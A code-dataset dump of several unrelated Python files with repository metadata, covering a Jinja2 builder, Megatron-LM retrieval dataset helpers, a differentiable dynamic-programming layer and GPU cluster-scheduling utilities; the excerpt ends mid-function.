] | 1 | 2019-11-03T16:03:59.000Z | 2019-11-03T16:03:59.000Z | eka/classes/builders/jinja.py | viswanc/eka | edb0aa373f74ec297d0e35e9cd6d564264322698 | [
"MIT"
] | null | null | null | eka/classes/builders/jinja.py | viswanc/eka | edb0aa373f74ec297d0e35e9cd6d564264322698 | [
"MIT"
] | null | null | null | r"""
A builder based on Jinja2 Templates.
"""
from laufire.filesys import copyContent, ensureCleanDir, ensureDir, getContent, getPathPairs, getPathType, setContent
from jinja2 import Template
class jinjaBuilder(object):
def __init__(self):
pass
def render(self, templateText, Data):
return Template(templateText).render(Data)
def build(self, srcPath, tgtPath, Data):
ensureCleanDir(tgtPath)
for src, tgt in getPathPairs(srcPath, tgtPath):
if getPathType(src) != 1:
ensureDir(tgt)
elif tgt[-6:] != '.jinja':
copyContent(src, tgt)
else:
setContent(tgt[:-6], Template(getContent(src)).render(Data))
return tgtPath
| 23.689655 | 117 | 0.687045 |
ce63046aa520b39ed884ea82211df4f45f55fff2 | 7,563 | py | Python | megatron/data/biencoder_dataset_utils.py | sourcery-ai-bot/Megatron-LM | f27f44e2c49d1cb39b2288bef6f7d837e11094cb | [
"MIT"
] | null | null | null | megatron/data/biencoder_dataset_utils.py | sourcery-ai-bot/Megatron-LM | f27f44e2c49d1cb39b2288bef6f7d837e11094cb | [
"MIT"
] | null | null | null | megatron/data/biencoder_dataset_utils.py | sourcery-ai-bot/Megatron-LM | f27f44e2c49d1cb39b2288bef6f7d837e11094cb | [
"MIT"
] | null | null | null | import os
import time
import numpy as np
import torch
from megatron import get_args, get_tokenizer, mpu, print_rank_0
from megatron.data.dataset_utils import create_masked_lm_predictions, \
pad_and_convert_to_numpy
from megatron.data.data_samplers import MegatronPretrainingSampler
def make_attention_mask(source_block, target_block):
"""
Returns a 2-dimensional (2-D) attention mask
:param source_block: 1-D array
:param target_block: 1-D array
"""
mask = (target_block[None, :] >= 1) * (source_block[:, None] >= 1)
mask = mask.astype(np.int64)
# (source_length, target_length)
return mask
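# Hedged illustration (not in the original module): for a 1-D source_block of length S and a
# 1-D target_block of length T, the result is an (S, T) int64 mask that is 1 only where both
# positions hold a non-padding (>= 1) token id. For example:
#   make_attention_mask(np.array([2, 0]), np.array([3, 4, 0]))
#   -> array([[1, 1, 0],
#             [0, 0, 0]])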
def get_one_epoch_dataloader(dataset, micro_batch_size=None):
"""Specifically one epoch to be used in an indexing job."""
args = get_args()
if micro_batch_size is None:
micro_batch_size = args.micro_batch_size
num_workers = args.num_workers
# Use megatron's sampler with consumed samples set to 0 as
# this is only for evaluation and don't intend to resume half way.
# Also, set the drop last to false as don't intend to remove
# the last batch
batch_sampler = MegatronPretrainingSampler(
total_samples=len(dataset),
consumed_samples=0,
        micro_batch_size=micro_batch_size,
data_parallel_rank=mpu.get_data_parallel_rank(),
data_parallel_size=mpu.get_data_parallel_world_size(),
drop_last=False)
return torch.utils.data.DataLoader(dataset,
batch_sampler=batch_sampler,
num_workers=num_workers,
pin_memory=True)
def get_ict_batch(data_iterator):
# Items and their type.
keys = ['query_tokens', 'query_mask',
'context_tokens', 'context_mask', 'block_data']
datatype = torch.int64
# Broadcast data.
data = None if data_iterator is None else next(data_iterator)
data_b = mpu.broadcast_data(keys, data, datatype)
# Unpack.
query_tokens = data_b['query_tokens'].long()
query_mask = data_b['query_mask'] < 0.5
context_tokens = data_b['context_tokens'].long()
context_mask = data_b['context_mask'] < 0.5
block_indices = data_b['block_data'].long()
return query_tokens, query_mask,\
context_tokens, context_mask, block_indices
def join_str_list(str_list):
"""Join a list of strings, handling spaces appropriately"""
return "".join(s[2:] if s.startswith("##") else " " + s for s in str_list)
class BlockSampleData(object):
"""A struct for fully describing a fixed-size block of data as used in REALM
:param start_idx: for first sentence of the block
:param end_idx: for last sentence of the block (may be partially truncated in sample construction)
:param doc_idx: the index of the document from which the block comes in the original indexed dataset
:param block_idx: a unique integer identifier given to every block.
"""
def __init__(self, start_idx, end_idx, doc_idx, block_idx):
self.start_idx = start_idx
self.end_idx = end_idx
self.doc_idx = doc_idx
self.block_idx = block_idx
def as_array(self):
return np.array([self.start_idx, self.end_idx, self.doc_idx, self.block_idx]).astype(np.int64)
def as_tuple(self):
return self.start_idx, self.end_idx, self.doc_idx, self.block_idx
class BlockSamplesMapping(object):
def __init__(self, mapping_array):
# make sure that the array is compatible with BlockSampleData
assert mapping_array.shape[1] == 4
self.mapping_array = mapping_array
def __len__(self):
return self.mapping_array.shape[0]
def __getitem__(self, idx):
"""Get the data associated with an indexed sample."""
return BlockSampleData(*self.mapping_array[idx])
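# Hedged illustration (not in the original module): the mapping is a plain (N, 4) int64 array;
# wrapping it gives per-sample structured access, e.g.
#   mapping = BlockSamplesMapping(np.array([[0, 3, 7, 42]], dtype=np.int64))
#   sample = mapping[0]     # BlockSampleData with start_idx=0, end_idx=3, doc_idx=7, block_idx=42
#   sample.as_tuple()       # (0, 3, 7, 42)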
def get_block_samples_mapping(block_dataset, title_dataset, data_prefix, num_epochs,
max_num_samples, max_seq_length, seed, name, use_one_sent_docs=False):
"""Get samples mapping for a dataset over fixed size blocks. This function also requires
a dataset of the titles for the source documents since their lengths must be taken into account.
:return: samples_mapping (BlockSamplesMapping)
"""
if not num_epochs:
if not max_num_samples:
raise ValueError("Need to specify either max_num_samples "
"or num_epochs")
num_epochs = np.iinfo(np.int32).max - 1
if not max_num_samples:
max_num_samples = np.iinfo(np.int64).max - 1
# Filename of the index mapping
indexmap_filename = data_prefix
indexmap_filename += '_{}_indexmap'.format(name)
if num_epochs != (np.iinfo(np.int32).max - 1):
indexmap_filename += '_{}ep'.format(num_epochs)
if max_num_samples != (np.iinfo(np.int64).max - 1):
indexmap_filename += '_{}mns'.format(max_num_samples)
indexmap_filename += '_{}msl'.format(max_seq_length)
indexmap_filename += '_{}s'.format(seed)
if use_one_sent_docs:
indexmap_filename += '_1sentok'
indexmap_filename += '.npy'
# Build the indexed mapping if not exist.
if mpu.get_data_parallel_rank() == 0 and \
not os.path.isfile(indexmap_filename):
print(' > WARNING: could not find index map file {}, building '
'the indices on rank 0 ...'.format(indexmap_filename))
# Make sure the types match the helpers input types.
assert block_dataset.doc_idx.dtype == np.int64
assert block_dataset.sizes.dtype == np.int32
# Build samples mapping
verbose = torch.distributed.get_rank() == 0
start_time = time.time()
print_rank_0(' > building samples index mapping for {} ...'.format(
name))
from megatron.data import helpers
mapping_array = helpers.build_blocks_mapping(
block_dataset.doc_idx,
block_dataset.sizes,
title_dataset.sizes,
num_epochs,
max_num_samples,
max_seq_length - 3, # account for added tokens
seed,
verbose,
use_one_sent_docs)
print_rank_0(' > done building samples index mapping')
np.save(indexmap_filename, mapping_array, allow_pickle=True)
print_rank_0(' > saved the index mapping in {}'.format(
indexmap_filename))
# Make sure all the ranks have built the mapping
print_rank_0(' > elapsed time to build and save samples mapping '
'(seconds): {:4f}'.format(
time.time() - start_time))
# This should be a barrier but nccl barrier assumes
# device_index=rank which is not the case for model
# parallel case
counts = torch.cuda.LongTensor([1])
torch.distributed.all_reduce(counts, group=mpu.get_data_parallel_group())
assert counts[0].item() == torch.distributed.get_world_size(
group=mpu.get_data_parallel_group())
# Load indexed dataset.
print_rank_0(' > loading indexed mapping from {}'.format(
indexmap_filename))
start_time = time.time()
mapping_array = np.load(indexmap_filename, allow_pickle=True, mmap_mode='r')
samples_mapping = BlockSamplesMapping(mapping_array)
print_rank_0(' loaded indexed file in {:3.3f} seconds'.format(
time.time() - start_time))
print_rank_0(' total number of samples: {}'.format(
mapping_array.shape[0]))
return samples_mapping
| 38.005025 | 104 | 0.665609 |
fbcfd0fd3b36832c775e1e2833a173c422c32911 | 1,701 | py | Python | server/src/services/dataCleaner.py | JRHutson/311-data | 4af3899d29a00cc090cf4c04a57863096b30bf7a | [
"MIT"
] | null | null | null | server/src/services/dataCleaner.py | JRHutson/311-data | 4af3899d29a00cc090cf4c04a57863096b30bf7a | [
"MIT"
] | null | null | null | server/src/services/dataCleaner.py | JRHutson/311-data | 4af3899d29a00cc090cf4c04a57863096b30bf7a | [
"MIT"
] | null | null | null | import sqlalchemy as db
import pandas as pd
from sqlIngest import DataHandler
import databaseOrm
class DataCleaner(DataHandler):
def __init__(self, config=None, configFilePath=None, separator=','):
self.data = None
self.config = config
self.dbString = None if not self.config \
else self.config['Database']['DB_CONNECTION_STRING']
self.filePath = None
self.configFilePath = configFilePath
self.separator = separator
self.fields = databaseOrm.tableFields
self.insertParams = databaseOrm.insertFields
self.readParams = databaseOrm.readFields
def fetchData(self):
'''Retrieve data from mySql database instance'''
engine = db.create_engine(self.dbString)
self.data = pd.read_sql('ingest_staging_table',
con=engine,
index_col='srnumber')
def formatData(self):
'''Perform changes to data formatting to ensure compatibility
with cleaning and frontend processes'''
pass
def groupData(self):
'''Cluster data by geographic area to remove repeat instances
of 311 reports'''
pass
def cleaningReport(self):
'''Write out cleaning report summarizing operations performed
on data as well as data characteristics'''
pass
if __name__ == "__main__":
'''Class DataHandler workflow from initial load to SQL population'''
cleaner = DataCleaner()
cleaner.loadConfig(configFilePath='../settings.cfg')
cleaner.fetchData()
# can use inherited ingestData method to write to table
cleaner.ingestData(tableName='clean_data')
| 34.02 | 72 | 0.654909 |
51aa25a8c207a49d5c938409a7a711d479839ef7 | 143 | py | Python | data_loader.py | bboltt/Bisect-K-Means | 41776f2abf55be77e14e8017c1271f3f3d434fc2 | [
"MIT"
] | null | null | null | data_loader.py | bboltt/Bisect-K-Means | 41776f2abf55be77e14e8017c1271f3f3d434fc2 | [
"MIT"
] | null | null | null | data_loader.py | bboltt/Bisect-K-Means | 41776f2abf55be77e14e8017c1271f3f3d434fc2 | [
"MIT"
] | null | null | null | import numpy as np
"""
load data as numpy array
"""
def get_dat_sets(file_path):
samples = np.genfromtxt(file_path)
return samples
| 11.916667 | 38 | 0.699301 |
e6aa609984136ea546ffcf98e08f120fb5723920 | 619 | py | Python | python/vechist/plot_vec.py | xintong-osu/VecHist | 83ed3533bd140848431908699adc1f0134463ea1 | [
"MIT"
] | 2 | 2019-11-02T12:35:33.000Z | 2020-04-04T13:30:40.000Z | python/vechist/plot_vec.py | xintong-osu/VecHist | 83ed3533bd140848431908699adc1f0134463ea1 | [
"MIT"
] | null | null | null | python/vechist/plot_vec.py | xintong-osu/VecHist | 83ed3533bd140848431908699adc1f0134463ea1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 19 01:04:40 2015
@author: tong
"""
def plot(d, stride):
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_aspect('equal')
d = d[::stride,::stride,::stride,:]
y, z, x = np.meshgrid(np.arange(0, d.shape[1]), np.arange(0, d.shape[0]), np.arange(0, d.shape[2]))
# print(d[:,:,:,0].shape)
# print(x.shape)
# print(y.shape)
# print(z.shape)
ax.quiver(x, y, z, d[:,:,:,0], d[:,:,:,1], d[:,:,:,2])
plt.show() | 22.925926 | 103 | 0.544426 |
1566627a759f95d60bd9acdaa930ed7eb4e23cca | 4,772 | py | Python | dp_layer/dp_function.py | NYU-DICE-Lab/graph_invnet | 166db79ac9ab3bff0e67ab0ec978da7efea042e2 | [
"MIT"
] | null | null | null | dp_layer/dp_function.py | NYU-DICE-Lab/graph_invnet | 166db79ac9ab3bff0e67ab0ec978da7efea042e2 | [
"MIT"
] | 4 | 2021-06-08T23:01:47.000Z | 2022-03-12T00:53:53.000Z | dp_layer/dp_function.py | NYU-DICE-Lab/graph_invnet | 166db79ac9ab3bff0e67ab0ec978da7efea042e2 | [
"MIT"
] | null | null | null | import torch
from torch.autograd import Function
class DPFunction(Function):
def __init__(self):
super(DPFunction, self).__init__()
@staticmethod
def forward(ctx, input, adj_array, rev_adj, max_op,replace):
        '''
        Parameters
        ----------
        input: torch.Tensor
            Edge weights (thetas) of shape (batch_size, n_nodes, 4)
        Returns
        -------
        v_hard: torch.Tensor
            Per-batch shortest (or longest, when max_op is set) path value computed by
            hard-DP; gradients flow through the smoothed soft-DP recursion saved for backward.
        '''
if not ctx.needs_input_grad[0]:
return DPFunction.hard_forward(input,adj_array,max_op,replace)
device=input.device
d_type=input.dtype
op=DPFunction.s_min
hard_op=torch.min
if max_op:
op=DPFunction.s_max
hard_op=torch.max
ctx.rev_map=rev_adj
thetas = input
batch_size,n_nodes,_= thetas.shape
assert n_nodes>1
V_hard=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device)
V=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device)
Q=torch.zeros((batch_size,n_nodes,4),dtype=d_type,device=device)
if replace==0:
V[:,-1]=replace
V_hard[:,-1]=replace
else:
V[:, -1] += replace
V_hard[:, -1] += replace
        V[:, -2] = 0
        V_hard[:, -2] = 0
for i in reversed(range(n_nodes-1)):
theta=thetas[:,i,:]
idxs=adj_array[i]
for dir,idx in enumerate(idxs):
if idx is None:
idxs[dir]=n_nodes
values=torch.stack([V[:,i] for i in idxs],dim=1)
options=values+theta
soft=op(options)
V[:,i],Q[:,i,:]=soft[0],soft[1]
hard_values = torch.stack([V_hard[:, i] for i in idxs], dim=1)
hard_options=hard_values+theta
V_hard[:,i]=hard_op(hard_options,dim=1)[0]
v_hard=V_hard[:,0]
ctx.save_for_backward(v_hard,Q)
return v_hard
@staticmethod
def backward(ctx,v_grad):
'''v_grad is the gradient of the loss with respect to v_hard'''
v_hard,Q = ctx.saved_tensors
b,n,_=Q.shape
E_hat=torch.zeros((b,n),dtype=Q.dtype,device=Q.device)
E = torch.zeros((b,n,4),dtype=Q.dtype,device=Q.device)
E[:,0,:]=Q[:,0,:]
E_hat[:,0]=1
for i in range(1,n):
back_idxs=ctx.rev_map[i]
total=torch.zeros((b),dtype=Q.dtype,device=Q.device)
for dir_idx,back_idx in enumerate(back_idxs):
if back_idx is not None and dir_idx <n:
parent=Q[:,back_idx,dir_idx]*E_hat[:,back_idx]
#E_hat is total effect of parent node on loss
#so parent represents the current node's effect on parent
total+=parent
E[:,back_idx,dir_idx]=parent
E_hat[:,i]=total
full_grad=v_grad.view(-1,1,1)*E
return full_grad,None,None,None,None
@staticmethod
def s_max(options):
max_x = torch.max(options, dim=1)[0].view(-1, 1)
exp_x = torch.exp(options - max_x)
Z = torch.sum(exp_x, dim=1).unsqueeze(-1)
smooth_max = (torch.log(Z) + max_x).squeeze()
probs = exp_x / Z
return smooth_max, probs
@staticmethod
def s_min(options):
neg_options = -1 * options
s_min_val, s_argmin = DPFunction.s_max(neg_options)
s_min_val *= -1
return s_min_val, s_argmin
@staticmethod
def hard_forward(input, adj_array, max_op,replace):
'''Computes v_hard as in forward(), but without any of the additional
computation needed to make function differentiable'''
device=input.device
d_type=input.dtype
hard_op=torch.min
if max_op:
hard_op=torch.max
thetas = input
batch_size,n_nodes,_= thetas.shape
assert n_nodes>1
V_hard=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device)
if replace==0:
V_hard[:,-1]=replace
else:
V_hard[:, -1] += replace
        V_hard[:, -2] = 0
for i in reversed(range(n_nodes-1)):
theta=thetas[:,i,:]
idxs=adj_array[i]
for dir,idx in enumerate(idxs):
if idx is None:
idxs[dir]=n_nodes
hard_values = torch.stack([V_hard[:, i] for i in idxs], dim=1)
hard_options=hard_values+theta
V_hard[:,i]=hard_op(hard_options,dim=1)[0]
v_hard=V_hard[:,0]
return v_hard | 34.330935 | 77 | 0.554484 |
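# --- Hedged sanity check (not part of the original file) ---
# s_max is the standard log-sum-exp smooth maximum, so its value should agree with
# torch.logsumexp and its returned probabilities with torch.softmax on the same options.
if __name__ == "__main__":
    _options = torch.tensor([[1.0, 2.0, 3.0], [0.5, 0.5, 0.5]])
    _smooth, _probs = DPFunction.s_max(_options)
    assert torch.allclose(_smooth, torch.logsumexp(_options, dim=1))
    assert torch.allclose(_probs, torch.softmax(_options, dim=1))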
b79ddf75bbba445dd088867b6f5092289037d8f5 | 22,758 | py | Python | cluster_scheduling/scheduler/utils.py | stanford-futuredata/POP | baa041dc67a465b8111e22e215880fa7d4fe8c61 | [
"MIT"
] | 15 | 2021-09-24T14:03:52.000Z | 2022-03-28T15:44:21.000Z | cluster_scheduling/scheduler/utils.py | stanford-futuredata/POP | baa041dc67a465b8111e22e215880fa7d4fe8c61 | [
"MIT"
] | 1 | 2021-12-14T09:05:29.000Z | 2021-12-16T11:55:55.000Z | cluster_scheduling/scheduler/utils.py | stanford-futuredata/POP | baa041dc67a465b8111e22e215880fa7d4fe8c61 | [
"MIT"
] | 2 | 2022-01-05T12:29:01.000Z | 2022-01-15T03:10:11.000Z | import csv
from datetime import datetime
import json
import os
import pickle
import psutil
import random
import re
import socket
import subprocess
from job import Job
from job_table import JobTable
from policies import allox, fifo, finish_time_fairness, gandiva, isolated, \
max_min_fairness, max_min_fairness_water_filling, max_sum_throughput, \
min_total_duration
def _generate_scale_factor(rng):
# Sample the scale factor from the Philly distribution.
scale_factor = 1
r = rng.uniform(0, 1)
if 0.7 <= r <= 0.8:
scale_factor = 2
elif 0.8 <= r <= 0.95:
scale_factor = 4
elif 0.95 <= r:
scale_factor = 8
return scale_factor
def _generate_duration(rng):
# Sample the job duration from the Philly distribution.
if rng.random() >= 0.8:
run_time = 60 * (10 ** rng.uniform(3, 4))
else:
run_time = 60 * (10 ** rng.uniform(1.5, 3))
return run_time
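# Hedged note (not in the original file): with the thresholds above, _generate_scale_factor
# draws 1 with probability ~0.70, 2 with ~0.10, 4 with ~0.15 and 8 with ~0.05, while
# _generate_duration draws ~20% long jobs (10^3..10^4 minutes) and ~80% shorter ones
# (10^1.5..10^3 minutes), mimicking the Philly trace.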
def generate_job(throughputs, reference_worker_type='v100', rng=None,
job_id=None, fixed_job_duration=None,
generate_multi_gpu_jobs=False,
generate_multi_priority_jobs=False, run_dir=None,
scale_factor_generator_func=_generate_scale_factor,
duration_generator_func=_generate_duration,
scale_factor_rng=None, duration_rng=None, SLO_rng=None,
always_generate_scale_factor=True):
"""Generates a new job.
Args:
throughputs: A dict containing pre-measured throughputs.
reference_worker_type: The worker type to use when calculating steps.
rng: A random number generator for selecting job parameters.
job_id: The job's ID.
fixed_job_duration: If set, fixes the duration to the specified value.
generate_multi_gpu_jobs: If set, generate a scale factor >= 1.
generate_multi_priority_jobs: If set, generate a priority >= 1.
run_dir: The directory to run the job from.
scale_factor_generator_func: A function that accepts an RNG parameter
and returns a job size.
duration_generator_func: A function that accepts an RNG parameter and
returns a job duration in seconds.
scale_factor_rng: A random number generator specifically for
generating scale factors.
duration_rng: A random number generator specifically for generating
durations.
SLO_rng: If set, generate an SLO >= 1 using this RNG.
always_generate_scale_factor: If set, generate a scale factor
regardless of whether user has
requested multi-GPU jobs.
Returns:
The generated Job.
"""
if rng is None:
rng = random.Random()
if scale_factor_rng is None:
scale_factor_rng = rng
if duration_rng is None:
duration_rng = rng
job_template = None
if always_generate_scale_factor:
scale_factor = scale_factor_generator_func(scale_factor_rng)
else:
# NOTE: We select the job template here to maintain backwards
# compatability with scripts/utils/generate_trace.py
job_template = rng.choice(JobTable)
if generate_multi_gpu_jobs and job_template.distributed:
scale_factor = scale_factor_generator_func(scale_factor_rng)
else:
scale_factor = 1
if fixed_job_duration:
run_time = fixed_job_duration
else:
run_time = duration_generator_func(duration_rng)
if not generate_multi_gpu_jobs:
scale_factor = 1
assert(run_time > 0)
assert(scale_factor >= 1 and scale_factor <= 8)
# Sample the job type.
if job_template is None:
while True:
job_template = rng.choice(JobTable)
if (scale_factor == 1 or
(scale_factor > 1 and job_template.distributed)):
break
job_type = job_template.model
# Complete the job command with the run directory.
command = job_template.command
if run_dir is not None:
if job_template.needs_data_dir:
command = command % (run_dir, run_dir)
else:
command = command % (run_dir)
# Compute the number of steps the job will run for given its duration.
key = (job_type, scale_factor)
assert(key in throughputs[reference_worker_type])
num_steps = run_time * throughputs[reference_worker_type][key]['null']
assert(num_steps > 0)
# Optionally assign a priority to the job.
priority_weight = 1.0
if generate_multi_priority_jobs:
r = rng.uniform(0, 1)
if 0.0 <= r <= 0.2:
priority_weight = 5.0
# Optionally assign an SLO to the job.
SLO = None
if SLO_rng is not None:
r = SLO_rng.uniform(0, 1)
if 0.0 <= r < 0.33:
SLO = 1.2
elif 0.33 <= r < 0.67:
SLO = 2.0
else:
SLO = 10.0
job = Job(job_id=job_id,
job_type=job_type,
command=command,
working_directory=job_template.working_directory,
num_steps_arg=job_template.num_steps_arg,
total_steps=num_steps,
duration=run_time,
scale_factor=scale_factor,
priority_weight=priority_weight,
SLO=SLO,
needs_data_dir=job_template.needs_data_dir)
return job
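# Hedged note (not in the original file): the throughputs argument must be keyed as
#   throughputs[worker_type][(model, scale_factor)]['null']
# and generate_job multiplies the sampled duration (seconds) by that value to obtain
# total_steps, so the 'null' entry acts as a steps-per-second rate for the reference
# worker type.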
def load_philly_job_distribution():
with open('philly_job_distribution.pickle', 'rb') as f:
return pickle.load(f)
def get_ip_address():
hostname = socket.gethostname()
ip_address = socket.gethostbyname(hostname)
return ip_address
def get_num_gpus():
command = 'nvidia-smi -L'
output = subprocess.run(command, stdout=subprocess.PIPE, check=True,
shell=True).stdout.decode('utf-8').strip()
return len(output.split('\n'))
def get_pid_for_job(command):
pids = []
for proc in psutil.process_iter():
cmdline = ' '.join(proc.cmdline())
if cmdline == command:
pids.append(proc.pid)
return min(pids)
def get_gpu_processes():
output = subprocess.check_output('nvidia-smi').decode('utf-8')
gpu_processes = {}
processes_flag = False
for line in output.split('\n'):
if 'Processes' in line:
processes_flag = True
continue
if processes_flag:
res = re.search('(\d+) +(\d+) +(\w+) +(.+) +(\d+)MiB', line)
if res is not None:
gpu_id = int(res.group(1))
if gpu_id not in gpu_processes:
gpu_processes[gpu_id] = []
pid = int(res.group(2))
process_name = res.group(4)
if process_name != 'nvidia-cuda-mps-server':
gpu_processes[gpu_id].append(pid)
return gpu_processes
def get_available_policies():
return ['allox',
'fifo', 'fifo_perf', 'fifo_packed',
'finish_time_fairness',
'finish_time_fairness_perf',
'finish_time_fairness_packed',
'gandiva',
'isolated',
'max_min_fairness',
'max_min_fairness_perf',
'max_min_fairness_packed',
'max_min_fairness_water_filling',
'max_min_fairness_water_filling_perf',
'max_min_fairness_water_filling_packed',
'max_sum_throughput_perf',
'max_sum_throughput_normalized_by_cost_perf',
'max_sum_throughput_normalized_by_cost_perf_SLOs',
'max_sum_throughput_normalized_by_cost_packed_SLOs',
'min_total_duration',
'min_total_duration_perf',
'min_total_duration_packed',
]
def read_per_instance_type_spot_prices_aws(directory):
# TODO: Make this flexible.
directory = os.path.join(directory, 'us-east-1')
per_instance_type_spot_prices = {}
for filename in os.listdir(directory):
full_filepath = os.path.join(directory, filename)
with open(full_filepath, 'r') as f:
json_obj = json.load(f)
for x in json_obj['SpotPriceHistory']:
instance_type = x['InstanceType']
if instance_type not in per_instance_type_spot_prices:
per_instance_type_spot_prices[instance_type] = []
per_instance_type_spot_prices[instance_type].append(x)
return per_instance_type_spot_prices
def read_per_instance_type_spot_prices_azure(directory):
per_instance_type_spot_prices = {}
for filename in os.listdir(directory):
full_filepath = os.path.join(directory, filename)
with open(full_filepath, 'r') as f:
zone = filename.replace(".csv", "")
reader = csv.reader(f)
i = 0
for row in reader:
if i == 0:
header = row
for header_elem in header[1:]:
if header_elem not in per_instance_type_spot_prices:
per_instance_type_spot_prices[header_elem] = {}
else:
for (header_elem, row_elem) in zip(header[1:], row[1:]):
if (zone not in per_instance_type_spot_prices[header_elem]):
per_instance_type_spot_prices[header_elem][zone] = []
date = datetime.strptime(row[0], '%m/%d/%Y')
per_instance_type_spot_prices[header_elem][zone].append((date, row_elem))
i += 1
return per_instance_type_spot_prices
def read_per_instance_type_spot_prices_json(directory):
per_instance_type_spot_prices = {}
per_instance_type_spot_prices['aws'] = \
read_per_instance_type_spot_prices_aws(os.path.join(directory,
'aws/logs'))
per_instance_type_spot_prices['azure'] = \
read_per_instance_type_spot_prices_azure(os.path.join(directory,
'azure/logs'))
per_instance_type_spot_prices['gcp'] = {
'v100': 0.74,
'p100': 0.43,
'k80': 0.135
}
return per_instance_type_spot_prices
def get_latest_price_for_worker_type_aws(worker_type, current_time,
per_instance_type_spot_prices):
# TODO: Make this function more efficient.
if worker_type == 'v100':
instance_type = 'p3.2xlarge'
elif worker_type == 'p100':
# NOTE: AWS does not have single P100 instances, use 1.5x K80 price
# as a proxy.
instance_type = 'p2.xlarge'
elif worker_type == 'k80':
instance_type = 'p2.xlarge'
timestamps = [datetime.strptime(x['Timestamp'], '%Y-%m-%dT%H:%M:%S.000Z')
for x in per_instance_type_spot_prices[instance_type]]
timestamps.sort()
availability_zones = \
[x['AvailabilityZone']
for x in per_instance_type_spot_prices[instance_type]]
latest_prices = []
for availability_zone in set(availability_zones):
per_instance_type_spot_prices[instance_type].sort(
key=lambda x: datetime.strptime(x['Timestamp'],
'%Y-%m-%dT%H:%M:%S.000Z'))
latest_price = None
for x in per_instance_type_spot_prices[instance_type]:
if x['AvailabilityZone'] != availability_zone:
continue
timestamp = (datetime.strptime(x['Timestamp'],
'%Y-%m-%dT%H:%M:%S.000Z') -
timestamps[0]).total_seconds()
if timestamp > current_time and latest_price is not None:
break
latest_price = float(x['SpotPrice'])
assert(latest_price is not None)
latest_prices.append(latest_price)
# NOTE: AWS does not have single P100 instances, use 1.5x K80 price
# as a proxy.
if worker_type == 'p100':
return min(latest_prices) * 1.5
else:
return min(latest_prices)
def get_latest_price_for_worker_type_gcp(worker_type, current_time,
per_instance_type_spot_prices):
return per_instance_type_spot_prices[worker_type]
def get_latest_price_for_worker_type_azure(worker_type, current_time,
per_instance_type_spot_prices):
if worker_type == 'k80':
instance_type = 'NC6'
elif worker_type == 'p100':
instance_type = 'NC6s v2'
elif worker_type == 'v100':
instance_type = 'NC6s v3'
earliest_timestamps = []
for zone in per_instance_type_spot_prices[instance_type]:
per_instance_type_spot_prices[instance_type][zone].sort(
key=lambda x: x[0])
earliest_timestamps.append(
per_instance_type_spot_prices[instance_type][zone][0][0])
earliest_timestamp = min(earliest_timestamps)
latest_prices = []
for zone in per_instance_type_spot_prices[instance_type]:
latest_price = None
for x in per_instance_type_spot_prices[instance_type][zone]:
timestamp = (x[0] - earliest_timestamp).total_seconds()
if timestamp > current_time and latest_price is not None:
break
elif x[1] == '':
continue
else:
# Remove '$' character.
latest_price = float(x[1][1:])
        if latest_price is not None:
            latest_prices.append(latest_price)
    return min(latest_prices)
def get_latest_price_for_worker_type(worker_type, current_time,
per_instance_type_spot_prices,
available_clouds):
assert(len(available_clouds) > 0)
prices = []
if 'aws' in available_clouds:
aws_price = \
get_latest_price_for_worker_type_aws(
worker_type, current_time,
per_instance_type_spot_prices['aws'])
prices.append(aws_price)
if 'gcp' in available_clouds:
gcp_price = \
get_latest_price_for_worker_type_gcp(
worker_type, current_time,
per_instance_type_spot_prices['gcp'])
prices.append(gcp_price)
if 'azure' in available_clouds:
azure_price = \
get_latest_price_for_worker_type_azure(
worker_type, current_time,
per_instance_type_spot_prices['azure'])
prices.append(azure_price)
return min(prices)
def parse_job_type_str(job_type):
if job_type is None:
return None
match = re.match('(.*) \(scale factor (\d+)\)', job_type)
if match is None:
return (job_type, 1)
model = match.group(1)
scale_factor = int(match.group(2))
return (model, scale_factor)
def parse_job_type_tuple(job_type):
match = re.match('\(\'(.*)\', (\d+)\)', job_type)
if match is None:
return None
model = match.group(1)
scale_factor = int(match.group(2))
return (model, scale_factor)
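# Hedged illustration (not in the original file); 'ResNet-18' is just a placeholder name:
#   parse_job_type_str('ResNet-18 (scale factor 4)')   -> ('ResNet-18', 4)
#   parse_job_type_str('ResNet-18')                    -> ('ResNet-18', 1)
#   parse_job_type_tuple("('ResNet-18', 4)")           -> ('ResNet-18', 4)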
def stringify_throughputs(throughputs):
stringified_throughputs = {}
for worker_type in throughputs:
stringified_throughputs[worker_type] = {}
for key in throughputs[worker_type]:
stringified_throughputs[worker_type][str(key)] = {}
for other_key in throughputs[worker_type][key]:
stringified_throughputs[worker_type][str(key)][str(other_key)] = \
throughputs[worker_type][key][other_key]
return stringified_throughputs
def read_all_throughputs_json_v2(file_name):
with open(file_name, 'r') as f:
raw_throughputs = json.load(f)
parsed_throughputs = {}
for worker_type in raw_throughputs:
parsed_throughputs[worker_type] = {}
for job_type in raw_throughputs[worker_type]:
key = parse_job_type_tuple(job_type)
assert(key is not None)
parsed_throughputs[worker_type][key] = {}
for other_job_type in raw_throughputs[worker_type][job_type]:
if other_job_type == 'null':
other_key = other_job_type
else:
other_key = parse_job_type_tuple(other_job_type)
assert(other_key is not None)
parsed_throughputs[worker_type][key][other_key] =\
raw_throughputs[worker_type][job_type][other_job_type]
return parsed_throughputs
def read_all_throughputs_json(throughputs_file):
with open(throughputs_file, 'r') as f:
throughputs = json.load(f)
return throughputs
def get_policy(policy_name, solver=None, seed=None,
priority_reweighting_policies=None,
num_threads=None):
if policy_name.startswith('allox'):
if policy_name == 'allox':
alpha = 1.0
else:
alpha = float(policy_name.split("allox_alpha=")[1])
policy = allox.AlloXPolicy(alpha=alpha)
elif policy_name == 'fifo':
policy = fifo.FIFOPolicy(seed=seed)
elif policy_name == 'fifo_perf':
policy = fifo.FIFOPolicyWithPerf()
elif policy_name == 'fifo_packed':
policy = fifo.FIFOPolicyWithPacking()
elif policy_name == 'finish_time_fairness':
policy = finish_time_fairness.FinishTimeFairnessPolicy(solver=solver,
num_threads=num_threads)
elif policy_name == 'finish_time_fairness_perf':
policy = \
finish_time_fairness.FinishTimeFairnessPolicyWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'finish_time_fairness_packed':
policy = \
finish_time_fairness.FinishTimeFairnessPolicyWithPacking(
solver=solver, num_threads=num_threads)
